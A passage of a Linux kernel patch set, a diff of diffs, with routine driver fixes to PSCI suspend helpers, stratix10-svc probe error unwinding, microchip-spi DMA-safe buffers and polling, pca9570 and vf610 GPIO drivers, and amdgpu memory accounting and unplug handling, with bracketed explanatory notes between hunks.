+@@ -128,7 +130,7 @@ static unsigned long __invoke_psci_fn_smc(unsigned long function_id,
+ 	return res.a0;
+ }
+ 
+-static int psci_to_linux_errno(int errno)
++static __always_inline int psci_to_linux_errno(int errno)
+ {
+ 	switch (errno) {
+ 	case PSCI_RET_SUCCESS:
+@@ -169,7 +171,8 @@ int psci_set_osi_mode(bool enable)
+ 	return psci_to_linux_errno(err);
+ }
+ 
+-static int __psci_cpu_suspend(u32 fn, u32 state, unsigned long entry_point)
++static __always_inline int
++__psci_cpu_suspend(u32 fn, u32 state, unsigned long entry_point)
+ {
+ 	int err;
+ 
+@@ -177,13 +180,15 @@ static int __psci_cpu_suspend(u32 fn, u32 state, unsigned long entry_point)
+ 	return psci_to_linux_errno(err);
+ }
+ 
+-static int psci_0_1_cpu_suspend(u32 state, unsigned long entry_point)
++static __always_inline int
++psci_0_1_cpu_suspend(u32 state, unsigned long entry_point)
+ {
+ 	return __psci_cpu_suspend(psci_0_1_function_ids.cpu_suspend,
+ 				  state, entry_point);
+ }
+ 
+-static int psci_0_2_cpu_suspend(u32 state, unsigned long entry_point)
++static __always_inline int
++psci_0_2_cpu_suspend(u32 state, unsigned long entry_point)
+ {
+ 	return __psci_cpu_suspend(PSCI_FN_NATIVE(0_2, CPU_SUSPEND),
+ 				  state, entry_point);
+@@ -450,10 +455,12 @@ late_initcall(psci_debugfs_init)
+ #endif
+ 
+ #ifdef CONFIG_CPU_IDLE
+-static int psci_suspend_finisher(unsigned long state)
++static noinstr int psci_suspend_finisher(unsigned long state)
+ {
+ 	u32 power_state = state;
+-	phys_addr_t pa_cpu_resume = __pa_symbol(cpu_resume);
++	phys_addr_t pa_cpu_resume;
++
++	pa_cpu_resume = __pa_symbol_nodebug((unsigned long)cpu_resume);
+ 
+ 	return psci_ops.cpu_suspend(power_state, pa_cpu_resume);
+ }
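
[The annotations above all serve one rule: code reachable from the CPU suspend path runs with instrumentation forbidden, so every helper on that path must either be noinstr itself or be __always_inline'd into a noinstr caller; an ordinary out-of-line call could carry tracing or sanitizer hooks. __pa_symbol_nodebug() likewise skips the CONFIG_DEBUG_VIRTUAL checking an instrumented __pa_symbol() would pull in. A compressed sketch of the rule; firmware_call is a stand-in, not a real API:

	/* helpers folded into the caller leave nothing for tracers to hook */
	static __always_inline u32 pack_state(u32 state)
	{
		return state & 0x0fffffff;
	}

	static noinstr int enter_lowpower(u32 state)
	{
		return firmware_call(pack_state(state));	/* hypothetical */
	}
]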
+diff --git a/drivers/firmware/stratix10-svc.c b/drivers/firmware/stratix10-svc.c
+index b4081f4d88a37..bde1f543f5298 100644
+--- a/drivers/firmware/stratix10-svc.c
++++ b/drivers/firmware/stratix10-svc.c
+@@ -1138,13 +1138,17 @@ static int stratix10_svc_drv_probe(struct platform_device *pdev)
+ 
+ 	/* allocate service controller and supporting channel */
+ 	controller = devm_kzalloc(dev, sizeof(*controller), GFP_KERNEL);
+-	if (!controller)
+-		return -ENOMEM;
++	if (!controller) {
++		ret = -ENOMEM;
++		goto err_destroy_pool;
++	}
+ 
+ 	chans = devm_kmalloc_array(dev, SVC_NUM_CHANNEL,
+ 				   sizeof(*chans), GFP_KERNEL | __GFP_ZERO);
+-	if (!chans)
+-		return -ENOMEM;
++	if (!chans) {
++		ret = -ENOMEM;
++		goto err_destroy_pool;
++	}
+ 
+ 	controller->dev = dev;
+ 	controller->num_chans = SVC_NUM_CHANNEL;
+@@ -1159,7 +1163,7 @@ static int stratix10_svc_drv_probe(struct platform_device *pdev)
+ 	ret = kfifo_alloc(&controller->svc_fifo, fifo_size, GFP_KERNEL);
+ 	if (ret) {
+ 		dev_err(dev, "failed to allocate FIFO\n");
+-		return ret;
++		goto err_destroy_pool;
+ 	}
+ 	spin_lock_init(&controller->svc_fifo_lock);
+ 
+@@ -1198,19 +1202,20 @@ static int stratix10_svc_drv_probe(struct platform_device *pdev)
+ 	ret = platform_device_add(svc->stratix10_svc_rsu);
+ 	if (ret) {
+ 		platform_device_put(svc->stratix10_svc_rsu);
+-		return ret;
++		goto err_free_kfifo;
+ 	}
+ 
+ 	svc->intel_svc_fcs = platform_device_alloc(INTEL_FCS, 1);
+ 	if (!svc->intel_svc_fcs) {
+ 		dev_err(dev, "failed to allocate %s device\n", INTEL_FCS);
+-		return -ENOMEM;
++		ret = -ENOMEM;
++		goto err_unregister_dev;
+ 	}
+ 
+ 	ret = platform_device_add(svc->intel_svc_fcs);
+ 	if (ret) {
+ 		platform_device_put(svc->intel_svc_fcs);
+-		return ret;
++		goto err_unregister_dev;
+ 	}
+ 
+ 	dev_set_drvdata(dev, svc);
+@@ -1219,8 +1224,12 @@ static int stratix10_svc_drv_probe(struct platform_device *pdev)
+ 
+ 	return 0;
+ 
++err_unregister_dev:
++	platform_device_unregister(svc->stratix10_svc_rsu);
+ err_free_kfifo:
+ 	kfifo_free(&controller->svc_fifo);
++err_destroy_pool:
++	gen_pool_destroy(genpool);
+ 	return ret;
+ }
+ 
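
[The probe rework above is the standard goto-unwind ladder: each resource needing manual cleanup gets a label, labels run in reverse order of acquisition, and every later failure jumps to the deepest label it has earned. The shape, reduced to two steps with hypothetical helpers:

	static int my_probe(struct platform_device *pdev)
	{
		struct gen_pool *pool;
		int ret;

		pool = make_pool(pdev);		/* hypothetical helper */
		if (!pool)
			return -ENOMEM;

		ret = second_step(pdev);	/* hypothetical helper */
		if (ret)
			goto err_destroy_pool;

		return 0;

	err_destroy_pool:
		gen_pool_destroy(pool);
		return ret;
	}
]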
+diff --git a/drivers/fpga/microchip-spi.c b/drivers/fpga/microchip-spi.c
+index 7436976ea9048..137fafdf57a6f 100644
+--- a/drivers/fpga/microchip-spi.c
++++ b/drivers/fpga/microchip-spi.c
+@@ -6,6 +6,7 @@
+ #include <asm/unaligned.h>
+ #include <linux/delay.h>
+ #include <linux/fpga/fpga-mgr.h>
++#include <linux/iopoll.h>
+ #include <linux/module.h>
+ #include <linux/of_device.h>
+ #include <linux/spi/spi.h>
+@@ -33,7 +34,7 @@
+ 
+ #define	MPF_BITS_PER_COMPONENT_SIZE	22
+ 
+-#define	MPF_STATUS_POLL_RETRIES		10000
++#define	MPF_STATUS_POLL_TIMEOUT		(2 * USEC_PER_SEC)
+ #define	MPF_STATUS_BUSY			BIT(0)
+ #define	MPF_STATUS_READY		BIT(1)
+ #define	MPF_STATUS_SPI_VIOLATION	BIT(2)
+@@ -42,46 +43,55 @@
+ struct mpf_priv {
+ 	struct spi_device *spi;
+ 	bool program_mode;
++	u8 tx __aligned(ARCH_KMALLOC_MINALIGN);
++	u8 rx;
+ };
+ 
+-static int mpf_read_status(struct spi_device *spi)
++static int mpf_read_status(struct mpf_priv *priv)
+ {
+-	u8 status = 0, status_command = MPF_SPI_READ_STATUS;
+-	struct spi_transfer xfers[2] = { 0 };
+-	int ret;
+-
+ 	/*
+ 	 * HW status is returned on MISO in the first byte after CS went
+ 	 * active. However, first reading can be inadequate, so we submit
+ 	 * two identical SPI transfers and use result of the later one.
+ 	 */
+-	xfers[0].tx_buf = &status_command;
+-	xfers[1].tx_buf = &status_command;
+-	xfers[0].rx_buf = &status;
+-	xfers[1].rx_buf = &status;
+-	xfers[0].len = 1;
+-	xfers[1].len = 1;
+-	xfers[0].cs_change = 1;
++	struct spi_transfer xfers[2] = {
++		{
++			.tx_buf = &priv->tx,
++			.rx_buf = &priv->rx,
++			.len = 1,
++			.cs_change = 1,
++		}, {
++			.tx_buf = &priv->tx,
++			.rx_buf = &priv->rx,
++			.len = 1,
++		},
++	};
++	u8 status;
++	int ret;
+ 
+-	ret = spi_sync_transfer(spi, xfers, 2);
++	priv->tx = MPF_SPI_READ_STATUS;
++
++	ret = spi_sync_transfer(priv->spi, xfers, 2);
++	if (ret)
++		return ret;
++
++	status = priv->rx;
+ 
+ 	if ((status & MPF_STATUS_SPI_VIOLATION) ||
+ 	    (status & MPF_STATUS_SPI_ERROR))
+-		ret = -EIO;
++		return -EIO;
+ 
+-	return ret ? : status;
++	return status;
+ }
+ 
+ static enum fpga_mgr_states mpf_ops_state(struct fpga_manager *mgr)
+ {
+ 	struct mpf_priv *priv = mgr->priv;
+-	struct spi_device *spi;
+ 	bool program_mode;
+ 	int status;
+ 
+-	spi = priv->spi;
+ 	program_mode = priv->program_mode;
+-	status = mpf_read_status(spi);
++	status = mpf_read_status(priv);
+ 
+ 	if (!program_mode && !status)
+ 		return FPGA_MGR_STATE_OPERATING;
+@@ -185,52 +195,53 @@ static int mpf_ops_parse_header(struct fpga_manager *mgr,
+ 	return 0;
+ }
+ 
+-/* Poll HW status until busy bit is cleared and mask bits are set. */
+-static int mpf_poll_status(struct spi_device *spi, u8 mask)
++static int mpf_poll_status(struct mpf_priv *priv, u8 mask)
+ {
+-	int status, retries = MPF_STATUS_POLL_RETRIES;
++	int ret, status;
+ 
+-	while (retries--) {
+-		status = mpf_read_status(spi);
+-		if (status < 0)
+-			return status;
+-
+-		if (status & MPF_STATUS_BUSY)
+-			continue;
+-
+-		if (!mask || (status & mask))
+-			return status;
+-	}
++	/*
++	 * Busy poll HW status. Polling stops if any of the following
++	 * conditions are met:
++	 *  - timeout is reached
++	 *  - mpf_read_status() returns an error
++	 *  - busy bit is cleared AND mask bits are set
++	 */
++	ret = read_poll_timeout(mpf_read_status, status,
++				(status < 0) ||
++				((status & (MPF_STATUS_BUSY | mask)) == mask),
++				0, MPF_STATUS_POLL_TIMEOUT, false, priv);
++	if (ret < 0)
++		return ret;
+ 
+-	return -EBUSY;
++	return status;
+ }
+ 
+-static int mpf_spi_write(struct spi_device *spi, const void *buf, size_t buf_size)
++static int mpf_spi_write(struct mpf_priv *priv, const void *buf, size_t buf_size)
+ {
+-	int status = mpf_poll_status(spi, 0);
++	int status = mpf_poll_status(priv, 0);
+ 
+ 	if (status < 0)
+ 		return status;
+ 
+-	return spi_write(spi, buf, buf_size);
++	return spi_write_then_read(priv->spi, buf, buf_size, NULL, 0);
+ }
+ 
+-static int mpf_spi_write_then_read(struct spi_device *spi,
++static int mpf_spi_write_then_read(struct mpf_priv *priv,
+ 				   const void *txbuf, size_t txbuf_size,
+ 				   void *rxbuf, size_t rxbuf_size)
+ {
+ 	const u8 read_command[] = { MPF_SPI_READ_DATA };
+ 	int ret;
+ 
+-	ret = mpf_spi_write(spi, txbuf, txbuf_size);
++	ret = mpf_spi_write(priv, txbuf, txbuf_size);
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = mpf_poll_status(spi, MPF_STATUS_READY);
++	ret = mpf_poll_status(priv, MPF_STATUS_READY);
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	return spi_write_then_read(spi, read_command, sizeof(read_command),
++	return spi_write_then_read(priv->spi, read_command, sizeof(read_command),
+ 				   rxbuf, rxbuf_size);
+ }
+ 
+@@ -242,7 +253,6 @@ static int mpf_ops_write_init(struct fpga_manager *mgr,
+ 	const u8 isc_en_command[] = { MPF_SPI_ISC_ENABLE };
+ 	struct mpf_priv *priv = mgr->priv;
+ 	struct device *dev = &mgr->dev;
+-	struct spi_device *spi;
+ 	u32 isc_ret = 0;
+ 	int ret;
+ 
+@@ -251,9 +261,7 @@ static int mpf_ops_write_init(struct fpga_manager *mgr,
+ 		return -EOPNOTSUPP;
+ 	}
+ 
+-	spi = priv->spi;
+-
+-	ret = mpf_spi_write_then_read(spi, isc_en_command, sizeof(isc_en_command),
++	ret = mpf_spi_write_then_read(priv, isc_en_command, sizeof(isc_en_command),
+ 				      &isc_ret, sizeof(isc_ret));
+ 	if (ret || isc_ret) {
+ 		dev_err(dev, "Failed to enable ISC: spi_ret %d, isc_ret %u\n",
+@@ -261,7 +269,7 @@ static int mpf_ops_write_init(struct fpga_manager *mgr,
+ 		return -EFAULT;
+ 	}
+ 
+-	ret = mpf_spi_write(spi, program_mode, sizeof(program_mode));
++	ret = mpf_spi_write(priv, program_mode, sizeof(program_mode));
+ 	if (ret) {
+ 		dev_err(dev, "Failed to enter program mode: %d\n", ret);
+ 		return ret;
+@@ -274,11 +282,9 @@ static int mpf_ops_write_init(struct fpga_manager *mgr,
+ 
+ static int mpf_ops_write(struct fpga_manager *mgr, const char *buf, size_t count)
+ {
+-	u8 spi_frame_command[] = { MPF_SPI_FRAME };
+ 	struct spi_transfer xfers[2] = { 0 };
+ 	struct mpf_priv *priv = mgr->priv;
+ 	struct device *dev = &mgr->dev;
+-	struct spi_device *spi;
+ 	int ret, i;
+ 
+ 	if (count % MPF_SPI_FRAME_SIZE) {
+@@ -287,18 +293,18 @@ static int mpf_ops_write(struct fpga_manager *mgr, const char *buf, size_t count
+ 		return -EINVAL;
+ 	}
+ 
+-	spi = priv->spi;
+-
+-	xfers[0].tx_buf = spi_frame_command;
+-	xfers[0].len = sizeof(spi_frame_command);
++	xfers[0].tx_buf = &priv->tx;
++	xfers[0].len = 1;
+ 
+ 	for (i = 0; i < count / MPF_SPI_FRAME_SIZE; i++) {
+ 		xfers[1].tx_buf = buf + i * MPF_SPI_FRAME_SIZE;
+ 		xfers[1].len = MPF_SPI_FRAME_SIZE;
+ 
+-		ret = mpf_poll_status(spi, 0);
+-		if (ret >= 0)
+-			ret = spi_sync_transfer(spi, xfers, ARRAY_SIZE(xfers));
++		ret = mpf_poll_status(priv, 0);
++		if (ret >= 0) {
++			priv->tx = MPF_SPI_FRAME;
++			ret = spi_sync_transfer(priv->spi, xfers, ARRAY_SIZE(xfers));
++		}
+ 
+ 		if (ret) {
+ 			dev_err(dev, "Failed to write bitstream frame %d/%zu\n",
+@@ -317,12 +323,9 @@ static int mpf_ops_write_complete(struct fpga_manager *mgr,
+ 	const u8 release_command[] = { MPF_SPI_RELEASE };
+ 	struct mpf_priv *priv = mgr->priv;
+ 	struct device *dev = &mgr->dev;
+-	struct spi_device *spi;
+ 	int ret;
+ 
+-	spi = priv->spi;
+-
+-	ret = mpf_spi_write(spi, isc_dis_command, sizeof(isc_dis_command));
++	ret = mpf_spi_write(priv, isc_dis_command, sizeof(isc_dis_command));
+ 	if (ret) {
+ 		dev_err(dev, "Failed to disable ISC: %d\n", ret);
+ 		return ret;
+@@ -330,7 +333,7 @@ static int mpf_ops_write_complete(struct fpga_manager *mgr,
+ 
+ 	usleep_range(1000, 2000);
+ 
+-	ret = mpf_spi_write(spi, release_command, sizeof(release_command));
++	ret = mpf_spi_write(priv, release_command, sizeof(release_command));
+ 	if (ret) {
+ 		dev_err(dev, "Failed to exit program mode: %d\n", ret);
+ 		return ret;
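
[Two independent techniques land in this file. First, SPI transfer buffers must be DMA-safe: the core may map them for DMA, so the single tx/rx bytes move off the stack into the driver state, aligned so they cannot share a kmalloc-minalign slot with the fields around them. Second, the fixed 10000-iteration retry loop becomes read_poll_timeout() with a two-second ceiling, bounding the wait by time rather than by loop count. A sketch of the buffer layout, names hypothetical:

	#include <linux/slab.h>		/* ARCH_KMALLOC_MINALIGN */

	struct my_priv {
		struct spi_device *spi;
		bool program_mode;
		/* wire bytes isolated at a DMA-safe boundary so a cache
		 * flush/invalidate during DMA cannot clobber the fields
		 * above */
		u8 tx __aligned(ARCH_KMALLOC_MINALIGN);
		u8 rx;
	};
]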
+diff --git a/drivers/gpio/gpio-pca9570.c b/drivers/gpio/gpio-pca9570.c
+index 6c07a8811a7a5..6a5a8e593ed55 100644
+--- a/drivers/gpio/gpio-pca9570.c
++++ b/drivers/gpio/gpio-pca9570.c
+@@ -18,11 +18,11 @@
+ #define SLG7XL45106_GPO_REG	0xDB
+ 
+ /**
+- * struct pca9570_platform_data - GPIO platformdata
++ * struct pca9570_chip_data - GPIO platformdata
+  * @ngpio: no of gpios
+  * @command: Command to be sent
+  */
+-struct pca9570_platform_data {
++struct pca9570_chip_data {
+ 	u16 ngpio;
+ 	u32 command;
+ };
+@@ -36,7 +36,7 @@ struct pca9570_platform_data {
+  */
+ struct pca9570 {
+ 	struct gpio_chip chip;
+-	const struct pca9570_platform_data *p_data;
++	const struct pca9570_chip_data *chip_data;
+ 	struct mutex lock;
+ 	u8 out;
+ };
+@@ -46,8 +46,8 @@ static int pca9570_read(struct pca9570 *gpio, u8 *value)
+ 	struct i2c_client *client = to_i2c_client(gpio->chip.parent);
+ 	int ret;
+ 
+-	if (gpio->p_data->command != 0)
+-		ret = i2c_smbus_read_byte_data(client, gpio->p_data->command);
++	if (gpio->chip_data->command != 0)
++		ret = i2c_smbus_read_byte_data(client, gpio->chip_data->command);
+ 	else
+ 		ret = i2c_smbus_read_byte(client);
+ 
+@@ -62,8 +62,8 @@ static int pca9570_write(struct pca9570 *gpio, u8 value)
+ {
+ 	struct i2c_client *client = to_i2c_client(gpio->chip.parent);
+ 
+-	if (gpio->p_data->command != 0)
+-		return i2c_smbus_write_byte_data(client, gpio->p_data->command, value);
++	if (gpio->chip_data->command != 0)
++		return i2c_smbus_write_byte_data(client, gpio->chip_data->command, value);
+ 
+ 	return i2c_smbus_write_byte(client, value);
+ }
+@@ -127,8 +127,8 @@ static int pca9570_probe(struct i2c_client *client)
+ 	gpio->chip.get = pca9570_get;
+ 	gpio->chip.set = pca9570_set;
+ 	gpio->chip.base = -1;
+-	gpio->p_data = device_get_match_data(&client->dev);
+-	gpio->chip.ngpio = gpio->p_data->ngpio;
++	gpio->chip_data = device_get_match_data(&client->dev);
++	gpio->chip.ngpio = gpio->chip_data->ngpio;
+ 	gpio->chip.can_sleep = true;
+ 
+ 	mutex_init(&gpio->lock);
+@@ -141,15 +141,15 @@ static int pca9570_probe(struct i2c_client *client)
+ 	return devm_gpiochip_add_data(&client->dev, &gpio->chip, gpio);
+ }
+ 
+-static const struct pca9570_platform_data pca9570_gpio = {
++static const struct pca9570_chip_data pca9570_gpio = {
+ 	.ngpio = 4,
+ };
+ 
+-static const struct pca9570_platform_data pca9571_gpio = {
++static const struct pca9570_chip_data pca9571_gpio = {
+ 	.ngpio = 8,
+ };
+ 
+-static const struct pca9570_platform_data slg7xl45106_gpio = {
++static const struct pca9570_chip_data slg7xl45106_gpio = {
+ 	.ngpio = 8,
+ 	.command = SLG7XL45106_GPO_REG,
+ };
+diff --git a/drivers/gpio/gpio-vf610.c b/drivers/gpio/gpio-vf610.c
+index 9033db00c360d..d3f3a69d49077 100644
+--- a/drivers/gpio/gpio-vf610.c
++++ b/drivers/gpio/gpio-vf610.c
+@@ -317,7 +317,7 @@ static int vf610_gpio_probe(struct platform_device *pdev)
+ 
+ 	gc = &port->gc;
+ 	gc->parent = dev;
+-	gc->label = "vf610-gpio";
++	gc->label = dev_name(dev);
+ 	gc->ngpio = VF610_GPIO_PER_PORT;
+ 	gc->base = of_alias_get_id(np, "gpio") * VF610_GPIO_PER_PORT;
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd.h
+index 0040deaf8a83a..90a5254ec1387 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd.h
+@@ -97,7 +97,7 @@ struct amdgpu_amdkfd_fence {
+ 
+ struct amdgpu_kfd_dev {
+ 	struct kfd_dev *dev;
+-	uint64_t vram_used;
++	int64_t vram_used;
+ 	uint64_t vram_used_aligned;
+ 	bool init_complete;
+ 	struct work_struct reset_work;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
+index 3b5c53712d319..05b884fe0a927 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
+@@ -1612,6 +1612,7 @@ int amdgpu_amdkfd_gpuvm_alloc_memory_of_gpu(
+ 	struct amdgpu_bo *bo;
+ 	struct drm_gem_object *gobj = NULL;
+ 	u32 domain, alloc_domain;
++	uint64_t aligned_size;
+ 	u64 alloc_flags;
+ 	int ret;
+ 
+@@ -1667,22 +1668,23 @@ int amdgpu_amdkfd_gpuvm_alloc_memory_of_gpu(
+ 	 * the memory.
+ 	 */
+ 	if ((*mem)->aql_queue)
+-		size = size >> 1;
++		size >>= 1;
++	aligned_size = PAGE_ALIGN(size);
+ 
+ 	(*mem)->alloc_flags = flags;
+ 
+ 	amdgpu_sync_create(&(*mem)->sync);
+ 
+-	ret = amdgpu_amdkfd_reserve_mem_limit(adev, size, flags);
++	ret = amdgpu_amdkfd_reserve_mem_limit(adev, aligned_size, flags);
+ 	if (ret) {
+ 		pr_debug("Insufficient memory\n");
+ 		goto err_reserve_limit;
+ 	}
+ 
+ 	pr_debug("\tcreate BO VA 0x%llx size 0x%llx domain %s\n",
+-			va, size, domain_string(alloc_domain));
++			va, (*mem)->aql_queue ? size << 1 : size, domain_string(alloc_domain));
+ 
+-	ret = amdgpu_gem_object_create(adev, size, 1, alloc_domain, alloc_flags,
++	ret = amdgpu_gem_object_create(adev, aligned_size, 1, alloc_domain, alloc_flags,
+ 				       bo_type, NULL, &gobj);
+ 	if (ret) {
+ 		pr_debug("Failed to create BO on domain %s. ret %d\n",
+@@ -1739,7 +1741,7 @@ err_node_allow:
+ 	/* Don't unreserve system mem limit twice */
+ 	goto err_reserve_limit;
+ err_bo_create:
+-	amdgpu_amdkfd_unreserve_mem_limit(adev, size, flags);
++	amdgpu_amdkfd_unreserve_mem_limit(adev, aligned_size, flags);
+ err_reserve_limit:
+ 	mutex_destroy(&(*mem)->lock);
+ 	if (gobj)
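
[The invariant this hunk restores: the size passed to reserve_mem_limit and the size later passed to unreserve_mem_limit must be the same number, and both must match what the BO actually consumes. AQL queues allocate twice the user size, so the half-size is page-aligned once and reused everywhere; vram_used also widens to int64_t so any residual imbalance shows up as a negative value instead of a huge unsigned one. The kfd_chardev.c hunk further down applies the same halving and alignment to the per-process vram_usage counter. The arithmetic, as a sketch:

	u64 size = user_size;		/* size the ioctl requested */

	if (aql_queue)
		size >>= 1;		/* AQL buffers are allocated doubled */
	size = PAGE_ALIGN(size);	/* what the allocation really occupies */
	/* pass this same value to both reserve and unreserve */
]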
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index fbf2f24169eb5..d8e79de839d65 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -4022,7 +4022,8 @@ void amdgpu_device_fini_hw(struct amdgpu_device *adev)
+ 
+ 	amdgpu_gart_dummy_page_fini(adev);
+ 
+-	amdgpu_device_unmap_mmio(adev);
++	if (drm_dev_is_unplugged(adev_to_drm(adev)))
++		amdgpu_device_unmap_mmio(adev);
+ 
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+index 3fe277bc233f4..7f598977d6942 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+@@ -2236,6 +2236,8 @@ amdgpu_pci_remove(struct pci_dev *pdev)
+ 	struct drm_device *dev = pci_get_drvdata(pdev);
+ 	struct amdgpu_device *adev = drm_to_adev(dev);
+ 
++	drm_dev_unplug(dev);
++
+ 	if (adev->pm.rpm_mode != AMDGPU_RUNPM_NONE) {
+ 		pm_runtime_get_sync(dev->dev);
+ 		pm_runtime_forbid(dev->dev);
+@@ -2275,8 +2277,6 @@ amdgpu_pci_remove(struct pci_dev *pdev)
+ 
+ 	amdgpu_driver_unload_kms(dev);
+ 
+-	drm_dev_unplug(dev);
+-
+ 	/*
+ 	 * Flush any in flight DMA operations from device.
+ 	 * Clear the Bus Master Enable bit and then wait on the PCIe Device
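
[Moving drm_dev_unplug() to the top of remove flips the shutdown ordering: userspace entry points guarded by drm_dev_enter() start failing cleanly before teardown begins, instead of racing it; the paired amdgpu_device.c hunk above then unmaps MMIO only for a genuine unplug. The guard pattern those entry points rely on, in sketch form:

	int idx;

	if (!drm_dev_enter(ddev, &idx))		/* false once unplugged */
		return -ENODEV;
	/* ... safe to touch device state here ... */
	drm_dev_exit(idx);
]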
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+index 7a2fc920739bb..ba092072308fa 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+@@ -380,7 +380,7 @@ static int psp_init_sriov_microcode(struct psp_context *psp)
+ 		adev->virt.autoload_ucode_id = AMDGPU_UCODE_ID_CP_MES1_DATA;
+ 		break;
+ 	default:
+-		BUG();
++		ret = -EINVAL;
+ 		break;
+ 	}
+ 	return ret;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_trace.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_trace.h
+index 677ad2016976d..98d91ebf5c26b 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_trace.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_trace.h
+@@ -153,10 +153,10 @@ TRACE_EVENT(amdgpu_cs,
+ 
+ 	    TP_fast_assign(
+ 			   __entry->bo_list = p->bo_list;
+-			   __entry->ring = to_amdgpu_ring(job->base.sched)->idx;
++			   __entry->ring = to_amdgpu_ring(job->base.entity->rq->sched)->idx;
+ 			   __entry->dw = ib->length_dw;
+ 			   __entry->fences = amdgpu_fence_count_emitted(
+-				to_amdgpu_ring(job->base.sched));
++				to_amdgpu_ring(job->base.entity->rq->sched));
+ 			   ),
+ 	    TP_printk("bo_list=%p, ring=%u, dw=%u, fences=%u",
+ 		      __entry->bo_list, __entry->ring, __entry->dw,
+diff --git a/drivers/gpu/drm/amd/amdgpu/nbio_v7_2.c b/drivers/gpu/drm/amd/amdgpu/nbio_v7_2.c
+index 31776b12e4c45..4b0d563c6522c 100644
+--- a/drivers/gpu/drm/amd/amdgpu/nbio_v7_2.c
++++ b/drivers/gpu/drm/amd/amdgpu/nbio_v7_2.c
+@@ -382,6 +382,11 @@ static void nbio_v7_2_init_registers(struct amdgpu_device *adev)
+ 		if (def != data)
+ 			WREG32_PCIE_PORT(SOC15_REG_OFFSET(NBIO, 0, regBIF1_PCIE_MST_CTRL_3), data);
+ 		break;
++	case IP_VERSION(7, 5, 1):
++		data = RREG32_SOC15(NBIO, 0, regRCC_DEV2_EPF0_STRAP2);
++		data &= ~RCC_DEV2_EPF0_STRAP2__STRAP_NO_SOFT_RESET_DEV2_F0_MASK;
++		WREG32_SOC15(NBIO, 0, regRCC_DEV2_EPF0_STRAP2, data);
++		fallthrough;
+ 	default:
+ 		def = data = RREG32_PCIE_PORT(SOC15_REG_OFFSET(NBIO, 0, regPCIE_CONFIG_CNTL));
+ 		data = REG_SET_FIELD(data, PCIE_CONFIG_CNTL,
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c b/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
+index 6d291aa6386bd..f79b8e964140e 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
+@@ -1127,8 +1127,13 @@ static int kfd_ioctl_alloc_memory_of_gpu(struct file *filep,
+ 	}
+ 
+ 	/* Update the VRAM usage count */
+-	if (flags & KFD_IOC_ALLOC_MEM_FLAGS_VRAM)
+-		WRITE_ONCE(pdd->vram_usage, pdd->vram_usage + args->size);
++	if (flags & KFD_IOC_ALLOC_MEM_FLAGS_VRAM) {
++		uint64_t size = args->size;
++
++		if (flags & KFD_IOC_ALLOC_MEM_FLAGS_AQL_QUEUE_MEM)
++			size >>= 1;
++		WRITE_ONCE(pdd->vram_usage, pdd->vram_usage + PAGE_ALIGN(size));
++	}
+ 
+ 	mutex_unlock(&p->mutex);
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index af16d6bb974b7..1ba8a2905f824 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -1239,7 +1239,7 @@ static void mmhub_read_system_context(struct amdgpu_device *adev, struct dc_phy_
+ 	pa_config->gart_config.page_table_end_addr = page_table_end.quad_part << 12;
+ 	pa_config->gart_config.page_table_base_addr = page_table_base.quad_part;
+ 
+-	pa_config->is_hvm_enabled = 0;
++	pa_config->is_hvm_enabled = adev->mode_info.gpu_vm_support;
+ 
+ }
+ 
+@@ -1551,6 +1551,11 @@ static int amdgpu_dm_init(struct amdgpu_device *adev)
+ 	if (amdgpu_dc_feature_mask & DC_DISABLE_LTTPR_DP2_0)
+ 		init_data.flags.allow_lttpr_non_transparent_mode.bits.DP2_0 = true;
+ 
++	/* Disable SubVP + DRR config by default */
++	init_data.flags.disable_subvp_drr = true;
++	if (amdgpu_dc_feature_mask & DC_ENABLE_SUBVP_DRR)
++		init_data.flags.disable_subvp_drr = false;
++
+ 	init_data.flags.seamless_boot_edp_requested = false;
+ 
+ 	if (check_seamless_boot_capability(adev)) {
+@@ -2747,12 +2752,14 @@ static int dm_resume(void *handle)
+ 	drm_for_each_connector_iter(connector, &iter) {
+ 		aconnector = to_amdgpu_dm_connector(connector);
+ 
++		if (!aconnector->dc_link)
++			continue;
++
+ 		/*
+ 		 * this is the case when traversing through already created
+ 		 * MST connectors, should be skipped
+ 		 */
+-		if (aconnector->dc_link &&
+-		    aconnector->dc_link->type == dc_connection_mst_branch)
